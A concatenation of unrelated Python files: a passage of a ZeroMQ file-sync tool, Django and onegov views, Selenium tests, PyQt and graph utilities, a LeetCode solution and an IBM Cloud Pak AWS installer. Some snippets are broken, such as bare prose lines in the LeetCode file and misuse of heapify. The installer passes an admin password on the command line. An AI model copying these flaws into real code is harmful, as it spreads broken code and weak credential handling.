self.log('%s runing' % self.__class__.__name__)
while not self.stoped:
polls = self.poll(1000)
self.deal_poll(polls)
if not self.check_timeout():
if self.file.is_open():
self.sync_file_timeout()
self.delay_all_timeout()
else:
self.stop()
return
def remote_msg(self, remote, msg, level=logging.DEBUG):
self.log('remote: ' + msg, level)
return
def sync_file_timeout(self):
self.file.close()
return
class SendThread(ZsyncThread):
def __init__(self, ctx, remote_port, remote_sock,
inproc_sock, timeout, pipeline, chunksize,
src_path, file_queue, compress):
ZsyncThread.__init__(self, ctx, remote_port,
remote_sock, inproc_sock, timeout, pipeline, chunksize, compress)
self.file_queue = file_queue
self.src = zsync_utils.CommonPath(src_path)
return
def try_send_new_file(self, client):
self.file.close()
if not self.file_queue:
client.send_over()
self.stop()
return True
file_path = self.file_queue.popleft()
if os.path.islink(file_path):
client.remote_msg('skip link file: %s' % file_path)
return False
try:
file_stat = os.stat(file_path)
file_type = config.FILE_TYPE_DIR if os.path.isdir(file_path) \
else config.FILE_TYPE_FILE
if file_type == config.FILE_TYPE_FILE:
self.file.open(file_path, 'rb')
except Exception as e:
self.log(str(e), logging.ERROR)
client.remote_msg(str(e), logging.ERROR)
return False
file_size = file_stat.st_size
file_mode = file_stat.st_mode
file_time = file_stat.st_mtime
self.file.total = file_size
client.on_new_file(os.path.relpath(file_path, self.src.prefix_path),
file_type, file_mode, file_size, file_time)
return True
def query_new_file(self, client):
while not self.try_send_new_file(client):
pass
return
def fetch_file(self, client, offset):
offset = int(offset)
data = self.file.fetch(offset, self.chunksize)
if self.compress:
data = zlib.compress(data)
client.call_raw('on_fetch_file', str(offset), data)
#self.log('send file offset %s len %s' % (offset, len(data)))
return
def retry_file(self, client, file_path):
file_path = os.path.join(self.src.prefix_path, file_path)
self.log('sync file failed, auto put in queue again and retry: %s' % \
file_path, logging.ERROR)
self.file_queue.append(file_path)
self.query_new_file(client)
return
class RecvThread(ZsyncThread):
def __init__(self, ctx, remote_port, remote_sock,
inproc_sock, timeout, pipeline, chunksize, dst_path, compress):
ZsyncThread.__init__(self, ctx, remote_port,
remote_sock, inproc_sock, timeout, pipeline, chunksize, compress)
self.dst = zsync_utils.CommonPath(dst_path)
self.ready = True
return
def on_new_file(self, service, file_path, file_type, file_mode, file_size, file_mtime):
file_path = os.path.join(self.dst.path, file_path)
if file_type == config.FILE_TYPE_DIR:
dir_name = file_path
dir_mode = file_mode
dir_time = file_mtime
else:
dir_name = os.path.dirname(file_path)
dir_mode = None
dir_time = None
if zsync_utils.check_file_same(file_path, file_size, file_mtime):
service.query_new_file()
return
zsync_utils.fix_file_type(file_path, file_type)
zsync_utils.fix_file_type(dir_name, config.FILE_TYPE_DIR)
error = zsync_utils.makedir(dir_name, dir_mode, dir_time)
if error:
self.log(error, logging.ERROR)
service.query_new_file()
return
if file_type == config.FILE_TYPE_DIR:
service.query_new_file()
return
try:
self.file.open(file_path, 'wb', file_size, self.pipeline, file_mode, file_mtime)
except Exception as e:
service.query_new_file()
self.log(str(e), logging.ERROR)
return
if file_size == 0:
self.file.close()
service.query_new_file()
return
#self.log('fetching file: %s size %s' % (file_path, file_size))
self.sendfetch(service)
return
def sendfetch(self, service):
while self.file.credit:
if self.file.fetch_offset >= self.file.total:
break
# waiting for pre chunk
if len(self.file.chunk_map) > 10:
break
service.call_raw('fetch_file', str(self.file.fetch_offset))
self.file.fetch_offset += self.chunksize
self.file.credit -= 1
return
def on_fetch_file(self, service, offset, data):
# self.log('recv file offset %s len %s' % (offset, len(data)))
if self.compress:
data = zlib.decompress(data)
self.file.write_chunk(int(offset), data)
self.file.credit += 1
if self.file.writedone:
self.log('finish file %s' % self.file.path)
service.query_new_file()
else:
self.sendfetch(service)
return
def sync_file_timeout(self):
self.file.close()
relpath = os.path.relpath(self.file.path, self.dst.path)
self.remote.retry_file(relpath)
return
def send_over(self, service):
self.stop()
return
def run(self):
zsync_utils.fix_file_type(self.dst.path, config.FILE_TYPE_DIR)
self.remote.query_new_file()
ZsyncThread.run(self)
return
class FileTransciver(Transceiver):
def __init__(self, ctx, args):
Transceiver.__init__(self)
self.args = args
self.ctx = ctx
self.remote_sock = None
self.remote_ip = None
self.remote_port = None
self.remote = None
self.sender = False
self.inproc_sock = None
self.childs = []
self.child_proxies = []
self.file_queue = deque()
self.stoped = False
self.sub = None
self.src = zsync_utils.CommonPath(self.args.src)
self.dst = zsync_utils.CommonPath(self.args.dst)
self.excludes = zsync_utils.CommonExclude(self.args.excludes)
return
def remote_msg(self, remote, msg, level=logging.DEBUG):
MYLOGGER.log(level, 'remote: ' + msg)
return
def log(self, level, msg):
if level >= logging.ERROR and self.remote:
self.remote.remote_msg(msg, level)
MYLOGGER.log(level, msg)
return
def on_child_log(self, child, msg, level):
self.log(level, msg)
return
def do_stop(self, remote, msg='', level=logging.DEBUG):
if msg:
self.log(level, msg)
self.stop()
return
def stop(self):
if self.stoped:
return
[child.do_stop() for child in self.child_proxies]
[child.join() for child in self.childs]
if self.sub:
self.sub.wait()
self.stoped = True
return
def has_child_alive(self):
state = [child.is_alive() for child in self.childs]
if any(state):
return True
return False
def shake_hand(self, remote):
self.del_timeout(remote.sock)
remote.on_shake_hand()
return
def on_shake_hand(self, remote):
self.del_timeout(remote.sock)
return
@staticmethod
def put_queue(self, dpath, fnames):
if self.excludes:
deln = set()
for fname in fnames:
if self.excludes.isExclude(os.path.relpath(dpath, self.src.prefix_path), fname):
deln.add(fname)
fnames[:] = set(fnames) - deln
self.file_queue.extend([os.path.join(dpath, fname)
for fname in fnames])
return
def prepare_sender(self):
if not self.src.visitValid():
self.log(logging.ERROR, 'path not exist %s' % self.src.origin_path)
self.remote.do_stop()
return False
if os.path.islink(self.src.path):
self.log(logging.ERROR, 'path is not supported link %s' % self.src.origin_path)
self.remote.do_stop()
return False
if os.path.isdir(self.src.path):
os.path.walk(self.src.path, self.put_queue, self)
elif os.path.isfile(self.src.path):
self.file_queue.append(self.src.path)
else:
self.log(logging.ERROR, 'path is not dir nor file %s' % self.src.origin_path)
self.remote.do_stop()
return False
return True
def set_remote_ports(self, service, ports):
# logging.debug('set_remote_ports %s, %s' % (ports, self.sender))
if len(ports) != self.args.thread_num:
self.log(logging.CRITICAL, 'recv ports length is not equal to thread num: \
thread_num=%s, ports=%s' % (self.args.thread_num, ports))
service.do_stop()
return
self.create_childs(ports)
return
def create_childs(self, ports=None):
self.inproc, inproc_childs = zhelpers.zpipes(self.ctx, self.args.thread_num)
child_identities = [str(inproc_child.getsockopt_string(zmq.IDENTITY)) \
for inproc_child in inproc_childs]
remote_socks = [zhelpers.nonblocking_socket(self.ctx, zmq.PAIR) \
for i in xrange(self.args.thread_num)]
if ports:
for i, sock in enumerate(remote_socks):
sock.connect('tcp://%s:%s' % (self.remote_ip, ports[i]))
else:
ports = []
for i, sock in enumerate(remote_socks):
port = zhelpers.bind_to_random_port(sock)
ports.append(port)
self.remote.set_remote_ports(ports)
if self.sender:
for i, sock in enumerate(remote_socks):
self.childs.append(
SendThread(self.ctx, ports[i], sock,
inproc_childs[i], self.args.timeout, self.args.pipeline,
self.args.chunksize, self.src.path, self.file_queue,
self.args.compress)
)
else:
for i, sock in enumerate(remote_socks):
self.childs.append(
RecvThread(self.ctx, ports[i], sock,
inproc_childs[i], self.args.timeout, self.args.pipeline,
self.args.chunksize, self.dst.path, self.args.compress)
)
self.child_proxies = [Proxy(self, self.inproc, child_identities[i]) \
for i, inproc_child in enumerate(inproc_childs)]
self.register(self.inproc)
[child.start() for child in self.childs]
return
def _prepare(self):
return False
def run(self):
if not self._prepare():
MYLOGGER.critical('prepare failed')
return
MYLOGGER.debug('%s runing' % self.__class__.__name__)
while not self.stoped:
try:
polls = self.poll(1000)
self.deal_poll(polls)
progress = []
for child in self.childs:
if child.file.file:
progress.append((child.file.path, child.file.offset, child.file.total))
if progress:
log_file_progress(progress)
except KeyboardInterrupt:
self.log(logging.INFO, 'user interrupted, exit')
self.stop()
if self.remote:
self.remote.do_stop()
if not self.check_timeout():
MYLOGGER.info('timeout, exit')
self.stop()
break
if self.childs and not self.has_child_alive():
MYLOGGER.info('%s all thread stop, exit' % self.__class__.__name__)
self.stop()
break
return
|
import math
import matplotlib.pyplot as plt
from local_pathfinding.msg import latlon
from utilities import getDesiredHeading
import numpy as np
class State:
def __init__(self, x, y):
self.x = x
self.y = y
def getX(self):
return self.x
def getY(self):
return self.y
'''
position = latlon()
position.lat = -100
position.lon = 140
end = latlon()
end.lat = 10.3599
end.lon = -17.03663
start = latlon()
start.lat = 8.46696
start.lon = -47.03663
'''
start = State(140, -100)
end = State(-17.2, 10.0)
position = State(100.0, -140.0)
localPath = [start, end]
def localWaypointReached(position, localPath, localPathIndex):
position = latlon(float(position.getY()), float(position.getX()))
previousWaypoint = latlon(float(localPath[localPathIndex - 1].getY()), float(localPath[localPathIndex - 1].getX()))
localWaypoint = latlon(float(localPath[localPathIndex].getY()), float(localPath[localPathIndex].getX()))
isStartNorth = localWaypoint.lat < previousWaypoint.lat
isStartEast = localWaypoint.lon < previousWaypoint.lon
tangentSlope = (localWaypoint.lat - previousWaypoint.lat) / (localWaypoint.lon - previousWaypoint.lon)
normalSlope = -1/tangentSlope
startX = previousWaypoint.lon - localWaypoint.lon
startY = previousWaypoint.lat - localWaypoint.lat
boatX = position.lon - localWaypoint.lon
boatY = position.lat - localWaypoint.lat
plt.xlim(-200, 200)
plt.ylim(-200, 200)
plt.plot([0], [0], marker = 'o', markersize=10, color="red")
plt.plot([startX], [startY], marker="o", markersize=10, color="green")
plt.plot([boatX], [boatY], marker = "o", markersize=10, color = "black")
xvalues = [0, startX]
yvalues = [0, startY]
plt.plot(xvalues, yvalues, "-g")
x = np.linspace(-200, 200, 100)
y = normalSlope * x
plt.plot(x, y, '-r')
y = tangentSlope * x
plt.plot(x, y, '-b')
plt.show()
y = lambda x: normalSlope * x
x = lambda y: y / float(normalSlope)
print "isStartNorth", isStartNorth
print "y(x) = ", y(boatX)
print "boatY = ", boatY
print "isStartEast", isStartEast
print "x(y) = ", x(boatY)
print "boatX = ", boatX
if isStartNorth:
if boatY < y(boatX):
return True
elif boatY > y(boatX):
return True
if isStartEast:
if boatX < x(boatY):
return True
elif boatX > x(boatY):
return True
return False
print(localWaypointReached(position, localPath, 1))
|
""" The manage subscription views. """
import morepath
from onegov.election_day import _
from onegov.election_day import ElectionDayApp
from onegov.election_day.collections import UploadTokenCollection
from onegov.election_day.forms import EmptyForm
# from onegov.election_day.layouts import ManageUploadTokenItemsLayout
from onegov.election_day.layouts import ManageUploadTokensLayout
from onegov.election_day.models import UploadToken
# from uuid import uuid4
@ElectionDayApp.manage_html(
model=UploadTokenCollection,
template='manage/upload_tokens.pt'
)
def view_upload_tokens(self, request):
""" View all upload tokens as a list. """
return {
'layout': ManageUploadTokensLayout(self, request),
'title': _("Upload tokens"),
'upload_tokens': self.query().all(),
'new_token': request.link(self, 'create-token'),
}
@ElectionDayApp.manage_form(
model=UploadTokenCollection,
name='create-token',
form=EmptyForm
)
def create_upload_token(self, request, form):
""" Create a new upload token. """
layout = ManageUploadTokensLayout(self, request)
if form.submitted(request):
self.create()
request.message(_("Upload token created."), 'success')
return morepath.redirect(layout.manage_model_link)
return {
'layout': layout,
'form': form,
'message': _("Create a new upload token?"),
'button_text': _("Create"),
'title': _("Create token"),
'cancel': layout.manage_model_link
}
@ElectionDayApp.manage_form(
model=UploadToken,
name='delete'
)
def delete_upload_token(self, request, form):
""" Delete the upload token item. """
layout = ManageUploadTokensLayout(self, request)
if form.submitted(request):
upload_tokens = UploadTokenCollection(request.session)
upload_tokens.delete(self)
request.message(_("Upload token deleted."), 'success')
return morepath.redirect(layout.manage_model_link)
return {
'message': _(
'Do you really want to delete "${item}"?',
mapping={'item': self.token}
),
'layout': layout,
'form': form,
'title': self.token,
'subtitle': _("Delete upload token"),
'button_text': _("Delete upload token"),
'button_class': 'alert',
'cancel': layout.manage_model_link
}
|
from src.functions.Functions import Functions as Selenium
import unittest
import time
class Test_006(Selenium, unittest.TestCase):
def setUp(self):
Selenium.abrir_navegador(self, "http://chercher.tech/practice/frames-example-selenium-webdriver")
def test_006(self):
Selenium.get_json_file(self, "frames")
Selenium.switch_to_iframe(self, "Frame2")
Selenium.get_select_elements(self, "Frame2 Select").select_by_visible_text("Avatar")
Selenium.switch_to_parentFrame(self)
Selenium.switch_to_iframe(self, "Frame1")
Selenium.send_key_text(self, "Frame1 input", "Big dogs")
Selenium.switch_to_iframe(self, "Frame3")
Selenium.get_elements(self, "Frame3 input").click()
time.sleep(2)
def tearDown(self):
Selenium.tearDown(self)
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 2.0.2 on 2018-02-27 17:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tafaha', '0002_answer_image'),
]
operations = [
migrations.AlterField(
model_name='test',
name='picture',
field=models.ImageField(upload_to='Noneimg/tafaha'),
),
]
|
""" Class module prefDialog.py defining the PrefAutoDialog class thet builds automatically a simple Qt modal dialog for specifying application's preferences."""
# Imports
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from PyQt4.uic import *
from application.lib.instrum_classes import * # DEBUGGER
#********************************************
# prefAutoDialog class
#********************************************
class PrefAutoDialog(QDialog, Debugger):
"""
Class that builds automatically a simple Qt modal dialog for specifying application's preferences, from a preference dictionary passed to it.
if no dictionary is passed but parent is passed and has a prefDict attribute, this prefDict is used as the preference dictionary.
The syntax of the dictionary should be {key:keyValue,...} where keyValue ={'label':label,'type':type,...} is type dependant:
- boolean => keyValue ={'label':'my Boolean','type':bool,'value':True} => QCheckBox widget
- int,long,double,complex,float => keyValue ={'label':'my Int','type':int,'value':5} => QLineEdit
- 'multipleChoice' => keyValue ={'label':'my Choices','type':'multipleChoice','choices':[1,2,3],'value':1} => QComboBox widget
- str or anything else => keyValue ={'label':'my String','type':str,'value':'string content'} => QLineEdit widget
"""
def __init__(self, parent=None, prefDict=None):
self._parent = parent
QDialog.__init__(self, self._parent)
self.setWindowTitle("DataManager frontend preferences")
self.setMinimumWidth(300)
l = QGridLayout()
self._prefDict = prefDict
if prefDict is None and parent is not None:
if hasattr(parent, 'prefDict'):
self._prefDict = getattr(parent, 'prefDict')
self._widgetDict = {}
# buid a simple representation of the preference dictionary with
# Qwidgets
if self._prefDict:
for key in self._prefDict:
dicti = self._prefDict[key]
typ = dicti['type']
if typ == bool: # QCheckBox
widget = QCheckBox(QString(dicti['label']))
widget.setChecked(dicti['value'])
l.addWidget(widget, l.rowCount(), 0)
elif typ == 'multipleChoice': # QComboBox
widget = QComboBox()
widget.addItems(
map(lambda x: QString(str(x)), dicti['choices']))
index = 0
while index < widget.count() and widget.itemText(index) != QString(str(dicti['value'])):
index += 1
widget.setCurrentIndex(index)
l.addWidget(
QLabel(QString(dicti['label'])), l.rowCount(), 0)
l.addWidget(widget, l.rowCount() - 1, 1)
# put all other cases (int,long,double,complex,float) in
# QLIneEdit widgets
else:
widget = QLineEdit(QString(str(dicti['value'])))
l.addWidget(
QLabel(QString(dicti['label'])), l.rowCount(), 0)
l.addWidget(widget, l.rowCount() - 1, 1)
self._widgetDict[key] = widget
# end of build
okButton = QPushButton("OK")
cancelButton = QPushButton("Cancel")
self.connect(okButton, SIGNAL("clicked()"), self.ok)
self.connect(cancelButton, SIGNAL("clicked()"), self.cancel)
l.addWidget(cancelButton, l.rowCount(), 0)
l.addWidget(okButton, l.rowCount() - 1, 1)
self.setLayout(l)
def ok(self):
# modify here the preference dictionary from the widgets' states
for key in self._widgetDict:
widget, dicti = self._widgetDict[key], self._prefDict[key]
typ = dicti['type']
if typ == bool: # QCheckBox
dicti['value'] = widget.isChecked()
elif typ == 'multipleChoice': # QComboBox
dicti['value'] = dicti['choices'][widget.currentIndex()]
# put all other cases (int,long,double,complex,float) in QLIneEdit
# widgets
else:
dicti['value'] = dicti['type'](widget.text())
self.close()
def cancel(self):
# don't do anything and close
self.close()
|
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from .models import CustomUser
from django import forms
class PhoneWidget(forms.MultiWidget):
def __init__(self, code_l, n_l, attrs=None, *args):
widgets = [forms.TextInput(attrs={'size':code_l, 'maxlength': code_l}),
forms.TextInput(attrs={'size': n_l, 'maxlength': n_l}),]
super(PhoneWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if value:
return [value.code, value.number]
return ['', '']
def format_output(self, rendered_widgets):
return '+38 (' + rendered_widgets[0] + ')' + rendered_widgets[1]
class PhoneField(forms.MultiValueField):
def __init__(self, code_l, n_l, *args):
list_fields = [forms.CharField(), forms.CharField()]
super(PhoneField, self).__init__(list_fields, widget=PhoneWidget(code_l, n_l), *args)
def compress(self, values):
return '+38' + '(' + values[0] + ')' + values[1]
class CustomUserCreationForm(UserCreationForm):
"""
A form that creates a user, with no privileges, from the given email and
password.
"""
phone_number = PhoneField(3, 7)
def __init__(self, *args, **kargs):
super(CustomUserCreationForm, self).__init__(*args, **kargs)
# del self.fields['username']
class Meta:
model = CustomUser
fields = ['email', 'first_name', 'second_name', 'address', 'phone_number']
class CustomUserChangeForm(UserChangeForm):
"""A form for updating users. Includes all the fields on
the user, but replaces the password field with admin's
password hash display field.
"""
def __init__(self, *args, **kargs):
super(CustomUserChangeForm, self).__init__(*args, **kargs)
del self.fields['username']
class Meta:
model = CustomUser
fields = "__all__" |
from heapq import heapify, heappop
heapp = heapify([])
print type(heapp) |
from MAINTENANCEpack.PayMaintenance.PayOperation import PayOpe
db=PayOpe
class OpeValues:
def values(self,no, pdate):
ope = PayOpe()
res = ope.show(no, pdate)
print(res)
if res==True:
print("insert successfully")
# ope.selectQuery()
# ope.selectWhere(no)
else:
print("Record not insert ")
def sear(self,no):
op=PayOpe()
oo=op.selectWhere(no)
return oo
def upda(self,pdate,No1):
bb=db.update(pdate,No1)
return bb
|
import numpy as np
import random
import itertools
class graph():
def __init__(self, visited=False, id=None, adjacent=None, directed=False, color=-1, low=-1, index=-1):
self.visited = visited
self.id = id
self.adjacent = adjacent if adjacent != None else []
self.directed = directed
self.color = color
self.low = low
self.index = index
def add_adjacent(self, graph):
self.adjacent.append(graph)
if self.directed == False:
graph.adjacent.append(self)
def describe(self):
ads = [i.id for i in self.adjacent]
print("ID=#{}, Visited = {}, color={} ,adjacent={}".format(self.id, self.visited, self.color, ads))
def show_graph(nodes):
print("######### START GRAPH #########")
for n in nodes:
print(n.describe())
print("######### END GRAPH #########")
def get_random_pairs(numbers, directed):
# Generate all possible non-repeating pairs
if not directed:
pairs = list(itertools.combinations(numbers, 2))
else:
pairs = list(itertools.permutations(numbers, 2))
# Randomly shuffle these pairs
random.shuffle(pairs)
if not directed:
indx = (np.random.rand(len(pairs)) > 0.5) * 1
else:
indx = (np.random.rand(len(pairs)) > 0.85) * 1
tuples = []
for idx, f in enumerate(indx):
if f == 1:
tuples.append(pairs[idx])
else:
pass
return tuples
def random_graph_generator(nodes, directed=False,return_edges=False):
"""
Args:
nodes: number of graphs
max_nodes: maximum number of nodes in each graph
directed: directed graph or undirected graph
"""
edges = get_random_pairs(list(range(nodes)),directed)
graph_nodes = [] # list of nodes of graph
reverse_graph_nodes = [] # list of nodes of reversed graph in directed mode
for i in range(nodes):
graph_nodes.append(graph(id=i + 1, directed=directed))
if directed:
reverse_graph_nodes.append(graph(id=i + 1, directed=directed))
for e in edges:
s_index = e[0]
t_index = e[1]
graph_nodes[s_index].add_adjacent(graph_nodes[t_index])
if directed:
rs_index = e[1]
rt_index = e[0]
reverse_graph_nodes[rs_index].add_adjacent(reverse_graph_nodes[rt_index])
if not directed:
if return_edges:
return graph_nodes, len(edges)
else:
return graph_nodes
else:
if return_edges:
return graph_nodes, reverse_graph_nodes, len(edges)
else:
return graph_nodes, reverse_graph_nodes
# usage
# g,gr =random_graph_generator(10,directed=True)
|
import sys, cv2, math, numpy
import phase1, phase2, time
if len(sys.argv) > 2:
print 'skipping to frame', sys.argv[2]
if len(sys.argv) < 2:
print 'err: need argument mentioning video number'
sys.exit()
vnum = int(sys.argv[1])
###########
big_windows = 'ignore/' if vnum == 0 else ''
###########
###########
# check videos #5 and 6
fps_list = [15.002999, 29.970030, 30, 23.976150, 30, 29.970030, 30.001780, 30, 29.970030, 29.970030, 30, 15, 23.976024, 30, 15, 30, 29.873960, 30, 15, 25.000918, 30]
fps = fps_list[vnum-1]
video = cv2.VideoCapture('../public/videos/video'+str(vnum)+'.mp4')
fnum = 0
# if len(sys.argv) == 3:
# duration = 7980
# fnum = int(sys.argv[2])-1
# video.set(2, fnum /(duration*fps));
success, image = video.read()
prev = numpy.zeros(image.shape, numpy.uint8)
time1, time2 = 0, 0
while success:
fnum += 1
t_min = int((fnum/fps)/60)
t_sec = int(math.floor((fnum/fps)%60)) #check
if len(sys.argv) > 2 and fnum < int(sys.argv[2]) and fnum%7200 == 0:
print 'crossed frame', fnum # at time
if round(fnum%fps) == 1 and (len(sys.argv) < 3 or fnum >= int(sys.argv[2])): # process one frame each second
diff = cv2.subtract(image, prev)
imgray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
ndiff = cv2.countNonZero(imgray)
# sys.stdout.write("\r100%\033[K")
# print '\r%d:%02d processing...' % (t_min, t_sec), # (<ndiff> differences)
# sys.stdout.flush()
path = '../public/extracts/video'+str(vnum)
sys.stdout.write("\r100%\033[K")
print '\r%d:%02d finding segments...' % (t_min, t_sec),
sys.stdout.flush()
start1 = time.time()
# cv2.imwrite(path+'/frame'+str(fnum)+'.jpg', image)
segments = phase1.process(image, path, 'frame'+str(fnum)+'-segment', big_windows)
end1 = time.time()
time1 += end1 - start1
# write num_segments somewhere
sys.stdout.write("\r100%\033[K")
print '\r%d:%02d extracting text...' % (t_min, t_sec),
sys.stdout.flush()
start2 = time.time()
phase2.process(fnum, segments, path)
end2 = time.time()
time2 += end2 - start2
if ndiff > 7500: # show significant changes #improve
marked = image.copy()
ret, thresh = cv2.threshold(imgray, 60, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(marked, contours, -1, (0,255,0), 1)
cv2.imwrite(path+'/diffs/'+'frame'+str(fnum)+'.jpg', marked)
prev = image
# end of if stmt
success, image = video.read()
# end of while loop #todo
print '\ndone'
print '1:', round(time1, 2)
print '2:', round(time2, 2)
|
# 1392. Longest Happy Prefix
'''
A string is called a happy prefix if is a non-empty prefix which is also a suffix (excluding itself).
Given a string s. Return the longest happy prefix of s .
Return an empty string if no such prefix exists.
Example 1:
Input: s = "level"
Output: "l"
Explanation: s contains 4 prefix excluding itself ("l", "le", "lev", "leve"), and suffix ("l", "el", "vel", "evel"). The largest prefix which is also suffix is given by "l".
'''
Basic idea: hash
Similar to Rabin-Karp algorithm
class Solution:
def longestPrefix(self, s: str) -> str:
l, r = 0, 0
mod = 10**6 + 3
res = ''
for i in range(len(s)-1):
l = (l*33 + ord(s[i])) % mod
r = (r + pow(33, i, mod)*ord(s[~i])) % mod
if l == r:
res = s[:i+1]
return res |
''' Tests for chronicler.models.create_audit '''
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from chronicler.models import AuditItem, create_audit
from chronicler.tests import TestCase
from chronicler.tests.models import Person, Group, Membership
class TestCreateAudit(TestCase):
def test_create_audit(self):
''' Tests audit.models.create_audit receiver. Asserts that we properly
create an AuditItem
'''
person = Person.objects.create(name='Tester')
user, _ = User.objects.get_or_create(username='analyte')
content_type = ContentType.objects.get_for_model(Person)
group = Group.objects.create(name='group_one')
group_two = Group.objects.create(name='group_two')
member_one = Membership.objects.create(
person=person,
group=group,
gold_member=True
)
member_two = Membership.objects.create(
person=person,
group=group_two,
gold_member=False
)
create_audit(
Person,
person,
['membership_set'],
user
)
audit = AuditItem.objects.get(
content_type=content_type,
object_id=person.pk
)
data = audit.audit_data
audit_member_one, audit_member_two = data['membership_set']
self.assertEqual(audit_member_one['id'], member_one.pk)
self.assertEqual(audit_member_two['id'], member_two.pk)
self.assertEqual(audit_member_one['group'], member_one.group.pk)
self.assertEqual(audit_member_two['group'], member_two.group.pk)
self.assertEqual(audit_member_one['gold_member'], True)
self.assertEqual(audit_member_two['gold_member'], False)
member_two.gold_member = True
member_two.save()
create_audit(
Person,
person,
['membership_set'],
user
)
audit = AuditItem.objects.order_by('-pk')[0]
self.assertEqual(
audit.audit_data['membership_set'][1]['gold_member'],
True
)
|
#!/usr/bin/python
import sys, os.path, time, stat, socket, base64,json
import boto3
import shutil
import requests
import yapl.Utilities as Utilities
from subprocess import call,check_output, check_call, CalledProcessError, Popen, PIPE
from os import chmod, environ
from botocore.exceptions import ClientError
from yapl.Trace import Trace, Level
from yapl.LogExporter import LogExporter
from yapl.Exceptions import MissingArgumentException
TR = Trace(__name__)
StackParameters = {}
StackParameterNames = []
class CPDInstall(object):
ArgsSignature = {
'--region': 'string',
'--stack-name': 'string',
'--stackid': 'string',
'--logfile': 'string',
'--loglevel': 'string',
'--trace': 'string'
}
def __init__(self):
"""
Constructor
NOTE: Some instance variable initialization happens in self._init() which is
invoked early in main() at some point after _getStackParameters().
"""
object.__init__(self)
self.home = os.path.expanduser("/ibm")
self.logsHome = os.path.join(self.home,"logs")
self.sshHome = os.path.join(self.home,".ssh")
#endDef
def _getArg(self,synonyms,args,default=None):
"""
Return the value from the args dictionary that may be specified with any of the
argument names in the list of synonyms.
The synonyms argument may be a Jython list of strings or it may be a string representation
of a list of names with a comma or space separating each name.
The args is a dictionary with the keyword value pairs that are the arguments
that may have one of the names in the synonyms list.
If the args dictionary does not include the option that may be named by any
of the given synonyms then the given default value is returned.
NOTE: This method has to be careful to make explicit checks for value being None
rather than something that is just logically false. If value gets assigned 0 from
the get on the args (command line args) dictionary, that appears as false in a
condition expression. However 0 may be a legitimate value for an input parameter
in the args dictionary. We need to break out of the loop that is checking synonyms
as well as avoid assigning the default value if 0 is the value provided in the
args dictionary.
"""
value = None
if (type(synonyms) != type([])):
synonyms = Utilities.splitString(synonyms)
#endIf
for name in synonyms:
value = args.get(name)
if (value != None):
break
#endIf
#endFor
if (value == None and default != None):
value = default
#endIf
return value
#endDef
def _configureTraceAndLogging(self,traceArgs):
"""
Return a tuple with the trace spec and logFile if trace is set based on given traceArgs.
traceArgs is a dictionary with the trace configuration specified.
loglevel|trace <tracespec>
logfile|logFile <pathname>
If trace is specified in the trace arguments then set up the trace.
If a log file is specified, then set up the log file as well.
If trace is specified and no log file is specified, then the log file is
set to "trace.log" in the current working directory.
"""
logFile = self._getArg(['logFile','logfile'], traceArgs)
if (logFile):
TR.appendTraceLog(logFile)
#endIf
trace = self._getArg(['trace', 'loglevel'], traceArgs)
if (trace):
if (not logFile):
TR.appendTraceLog('trace.log')
#endDef
TR.configureTrace(trace)
#endIf
return (trace,logFile)
#endDef
def getStackParameters(self, stackId):
"""
Return a dictionary with stack parameter name-value pairs from the
CloudFormation stack with the given stackId.
"""
result = {}
stack = self.cfnResource.Stack(stackId)
stackParameters = stack.parameters
for parm in stackParameters:
parmName = parm['ParameterKey']
parmValue = parm['ParameterValue']
result[parmName] = parmValue
#endFor
return result
def __getattr__(self,attributeName):
"""
Support for attributes that are defined in the StackParameterNames list
and with values in the StackParameters dictionary.
"""
attributeValue = None
if (attributeName in StackParameterNames):
attributeValue = StackParameters.get(attributeName)
else:
raise AttributeError("%s is not a StackParameterName" % attributeName)
#endIf
return attributeValue
#endDef
def __setattr__(self,attributeName,attributeValue):
"""
Support for attributes that are defined in the StackParameterNames list
and with values in the StackParameters dictionary.
NOTE: The StackParameters are intended to be read-only. It's not
likely they would be set in the Bootstrap instance once they are
initialized in getStackParameters().
"""
if (attributeName in StackParameterNames):
StackParameters[attributeName] = attributeValue
else:
object.__setattr__(self, attributeName, attributeValue)
#endIf
#endDef
def installCPD(self,icpdInstallLogFile):
"""
creates a OC project with user defined name
Downloads binary file from S3 and extracts it to /ibm folder
installs user selected services using transfer method
"""
cloudctl_destPath = "/ibm/cloudctl-linux-amd64.tar.gz"
cloudctl_sig_destPath = "/ibm/cloudctl-linux-amd64.tar.gz.sig"
cp_datacore_destPath = "/ibm/ibm-cp-datacore.tgz"
methodName = "installCPD"
self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/cloudctl-linux-amd64.tar.gz", destPath=cloudctl_destPath)
self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/cloudctl-linux-amd64.tar.gz.sig", destPath=cloudctl_sig_destPath)
self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/ibm-cp-datacore-1.3.3.tgz", destPath=cp_datacore_destPath)
untar_cmd = "sudo tar -xvf "+cloudctl_destPath+" -C /usr/bin"
TR.info(methodName,"untarcmd =%s"%untar_cmd)
call(untar_cmd,shell=True,stdout=icpdInstallLogFile)
untar_datacore_cmd = "tar -xf "+cp_datacore_destPath
TR.info(methodName,"untar_datacore_cmd =%s"%untar_datacore_cmd)
call(untar_datacore_cmd,shell=True,stdout=icpdInstallLogFile)
default_route = "oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}'"
TR.info(methodName,"Get default route %s"%default_route)
try:
self.regsitry = check_output(['bash','-c', default_route])
TR.info(methodName,"Completed %s command with return value %s" %(default_route,self.regsitry))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.ocpassword = self.readFileContent("/ibm/installDir/auth/kubeadmin-password").rstrip("\n\r")
try:
oc_login = "oc login -u kubeadmin -p "+self.ocpassword
retcode = call(oc_login,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"Log in to OC with admin user %s"%retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
